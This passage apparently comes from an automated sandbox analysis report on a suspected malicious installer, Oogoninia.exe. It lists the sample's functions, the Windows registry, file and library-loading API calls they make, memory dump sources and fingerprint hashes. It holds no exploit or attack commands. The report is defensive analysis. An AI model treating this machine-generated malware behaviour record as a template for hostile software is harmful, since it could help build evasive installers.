                                                                                                                                                                                      • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000642,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024B3
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040254F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: 8e26defd033098e931a340efcbebfcd7db4374a64648cb469e792002de33b0c4
                                                                                                                                                                                    • Instruction ID: 0483b46094dd03155b9d0e3ed9d5b90596ace3d3fa60599072770b53af9213ab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e26defd033098e931a340efcbebfcd7db4374a64648cb469e792002de33b0c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8811E371A05205EFDB20CF60CA985AEBBB4AF00359F20443FE142B72C0D2B84A81DB5A
                                                                                                                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                    • Opcode ID: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                                                                                                                                    • Instruction ID: 00097469377630013da62b9f7c31fbdee85021c234e60ac5accdaffcc3ed26dc
                                                                                                                                                                                    • Opcode Fuzzy Hash: b63ad44f694a207690e677ec35bda8f999f5426b301403e6904e10af90410016
                                                                                                                                                                                    • Instruction Fuzzy Hash: BE01F4316242209BF7194B389C04B6A3698E751354F10813BF811F62F1D678DC028B4D
                                                                                                                                                                                    Function 00402377 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00402BD8: RegOpenKeyExA.KERNELBASE(00000000,00000642,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                                                                                                                                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 00402396
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040239F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 849931509-0
                                                                                                                                                                                    • Opcode ID: c3c705181fe5658603166456b70eb915c97a04fc9575d71e791babf096fcf5eb
                                                                                                                                                                                    • Instruction ID: 60c1e4243d723511b4c64426b25872ec533dbc6a778a8c73d92c97a5d2103592
                                                                                                                                                                                    • Opcode Fuzzy Hash: c3c705181fe5658603166456b70eb915c97a04fc9575d71e791babf096fcf5eb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 37F0A472A00111ABD710AFA09A8E9BE72A89B40344F24043BF201B71C0D5BD5D019769
                                                                                                                                                                                    Function 00401A1E Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnvironmentExpandStringslstrcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1938659011-0
                                                                                                                                                                                    • Opcode ID: e8d900abad3d3f7b08a48ee3306f5f417189d62f9577d7b4a96c9798fa742101
                                                                                                                                                                                    • Instruction ID: 4f813d77772bd54bf890c65dc17d1f1cff84f8c3aa104cf5f65d7bfaad8725e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: e8d900abad3d3f7b08a48ee3306f5f417189d62f9577d7b4a96c9798fa742101
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BF08231B05241EBCB20DF659D45A9A7FE8EFD1394B10843BE145F6190D2388541DA69
                                                                                                                                                                                    Function 00406139 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                                                                                                                                                      • Part of subcall function 004060CB: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004060E2
                                                                                                                                                                                      • Part of subcall function 004060CB: wsprintfA.USER32 ref: 0040611B
                                                                                                                                                                                      • Part of subcall function 004060CB: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040612F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                                                                    • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                                    • Instruction ID: 8cdf97aa15b56aed8909a69d1313546704d2aaf6dd9f7bed8459987902a8e277
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                                                                                                                                                                    • Instruction Fuzzy Hash: EFE08632608111AAD31067705E0493B73B89A84710302083EF506F6292D7389C2196A9
                                                                                                                                                                                    Function 00405A13 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 00405A17
                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A39
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                                                    • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                                    • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                                                                                                                                                                    Function 004054FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,00403173,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403370), ref: 00405502
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405510
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                                                    • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                    • Instruction ID: 104873d821a1170e2273ca40e0eecd38832efcbc0b1179f41fab49dbd7078dd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                                                                                                                                                    • Instruction Fuzzy Hash: 23C04C70629501FBDA106B209E097177D55AB90745F1049766106E20F4DA749451D92E
                                                                                                                                                                                    Function 004025D7 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2111968516-0
                                                                                                                                                                                    • Opcode ID: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
                                                                                                                                                                                    • Instruction ID: cbf00d81cb97437f3a5b335f5c35441536f11fd869f9e222d526ef6a243a720c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521C970D0429ABEDF218B9885486AEBF749F01314F1445BFEC95B63D1C2BE8A81CF19
                                                                                                                                                                                    Function 00402695 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
                                                                                                                                                                                      • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
